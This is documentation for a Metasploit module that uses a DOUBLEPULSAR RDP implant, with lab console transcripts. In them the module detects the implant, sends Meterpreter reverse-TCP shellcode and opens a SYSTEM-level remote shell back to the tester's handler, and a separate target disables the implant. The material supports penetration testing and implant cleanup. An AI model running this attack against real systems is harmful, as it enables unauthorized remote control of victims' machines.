metasploit-gs/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md

## Introduction

This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for RDP.

While this module primarily performs code execution against the implant,
the `Neutralize implant` target allows you to disable the implant.

## Targets

```
Id  Name
--  ----
0   Execute payload (x64)
1   Neutralize implant
```

## Options

**DefangedMode**

Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.

**ProcessName**

Set this to the userland process you want to inject the payload into.
Defaults to `spoolsv.exe`.

## Usage

Pinging the implant:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 192.168.56.115:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```

Executing a payload:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
[+] 192.168.56.115:3389 - Payload execution successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

Neutralizing the implant:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```